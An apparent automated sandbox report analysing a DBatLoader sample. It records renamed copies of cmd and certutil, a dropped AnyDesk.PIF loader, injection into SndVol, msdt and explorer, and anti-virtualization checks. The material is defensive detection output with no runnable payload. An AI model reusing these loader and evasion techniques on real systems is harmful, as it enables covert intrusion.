          Source: Binary string: msdt.pdbGCTL source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SndVol.exe, 00000011.00000003.1532906230.00000000345A4000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034900000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1653350692.0000000034A9E000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000003.1534972094.0000000034751000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004FDE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3865157782.0000000004E40000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1627063095.0000000004C95000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000003.1624680480.0000000004AC8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1420892123.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1424825690.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1431655568.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1443242487.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1444138946.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1444936141.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1445328763.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1446532317.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1521126197.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
          Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1446334242.00000000029F1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.00000000219CF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535579882.0000000002D6E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BDF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1535026723.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1549903683.0000000020BA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1445368322.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1524106394.0000000021A00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: SndVol.exe, 00000011.00000003.1624243350.0000000034C51000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1654717292.0000000034D50000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000011.00000003.1624334752.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000014.00000002.3863629531.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000012.00000002.3881344388.000000000FF7F000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3865958684.000000000538F000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000014.00000002.3863849789.00000000031D4000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected DBatLoader
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d40000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000003.1446631582.000000007F910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5894C LoadLibraryW,GetProcAddress,FreeLibrary,10_2_02D5894C
          Source: alpha.exe.3.drStatic PE information: section name: .didat
          Source: kn.exe.5.drStatic PE information: section name: .didat
          Source: alpha.pif.16.drStatic PE information: section name: .didat
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685443668 push rsp; ret 7_2_00007FF685443669
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D6D2FC push 02D6D367h; ret 10_2_02D6D35F
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D463B0 push 02D4640Bh; ret 10_2_02D46403
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D463AE push 02D4640Bh; ret 10_2_02D46403
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4C349 push 8B02D4C1h; ret 10_2_02D4C34E
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D6C378 push 02D6C56Eh; ret 10_2_02D6C566
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4332C push eax; ret 10_2_02D43368
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D6D0AC push 02D6D125h; ret 10_2_02D6D11D
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5306C push 02D530B9h; ret 10_2_02D530B1
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5306B push 02D530B9h; ret 10_2_02D530B1
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D6D1F8 push 02D6D288h; ret 10_2_02D6D280
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D6D144 push 02D6D1ECh; ret 10_2_02D6D1E4
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5F108 push ecx; mov dword ptr [esp], edx10_2_02D5F10D
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D46784 push 02D467C6h; ret 10_2_02D467BE
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D46782 push 02D467C6h; ret 10_2_02D467BE
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4D5A0 push 02D4D5CCh; ret 10_2_02D4D5C4
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D6C570 push 02D6C56Eh; ret 10_2_02D6C566
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4C56C push ecx; mov dword ptr [esp], edx10_2_02D4C571
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5AADF push 02D5AB18h; ret 10_2_02D5AB10
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D58AD8 push 02D58B10h; ret 10_2_02D58B08
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5AAE0 push 02D5AB18h; ret 10_2_02D5AB10
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4CA1F push 02D4CD72h; ret 10_2_02D4CD6A
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D4CBEC push 02D4CD72h; ret 10_2_02D4CD6A
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DB4850 push eax; ret 10_2_02DB4920
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5886C push 02D588AEh; ret 10_2_02D588A6
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D56946 push 02D569F3h; ret 10_2_02D569EB
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D56948 push 02D569F3h; ret 10_2_02D569EB
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5790C push 02D57989h; ret 10_2_02D57981
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D55E7C push ecx; mov dword ptr [esp], edx10_2_02D55E7E
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D52F60 push 02D52FD6h; ret 10_2_02D52FCE
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02AEE683 push ecx; retf 10_2_02AEE69A

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
          Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
          Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D5AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_02D5AB1C
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Allocates many large memory junks
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2D40000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2D41000 memory commit 500178944Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2D6D000 memory commit 500002816Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2D6E000 memory commit 500350976Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2DC4000 memory commit 501014528Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2EBC000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2EBE000 memory commit 500015104Jump to behavior
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\SndVol.exeRDTSC instruction interceptor: First address: 4999904 second address: 499990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\SndVol.exeRDTSC instruction interceptor: First address: 4999B7E second address: 4999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: E89904 second address: E8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: E89B7E second address: E89B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9427Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 496Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 817Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 2758Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 7212Jump to behavior
          Source: C:\Users\Public\alpha.exeAPI coverage: 7.9 %
          Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
          Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
          Source: C:\Users\Public\alpha.exeAPI coverage: 9.5 %
          Source: C:\Windows\explorer.exe TID: 2940Thread sleep count: 9427 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2940Thread sleep time: -18854000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2940Thread sleep count: 496 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2940Thread sleep time: -992000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF6E9447B4C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6E9447B4C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68548C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF68548C6F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6854F234C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F3100
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6854F10C4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6854F6F80
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6854D3674
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF68549D4A4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68545D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF68545D440
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF68549B3D8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF685495E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF685495E58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6854F1B04
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854F19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6854F19F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF68549DBC0
          Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_02D45908
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E943823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF6E943823C
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9432978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF6E9432978
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9421560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF6E9421560
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E94235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF6E94235B8
          Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF6E9447B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF6E9447B4C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854D511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF6854D511C
          Source: explorer.exe, 00000012.00000000.1548457580.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000012.00000003.3076789400.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: explorer.exe, 00000012.00000000.1540616435.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
          Source: AnyDesk.PIF, 0000000A.00000002.1533987559.0000000000980000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3876463266.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2284225017.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1548457580.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000012.00000003.2284225017.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
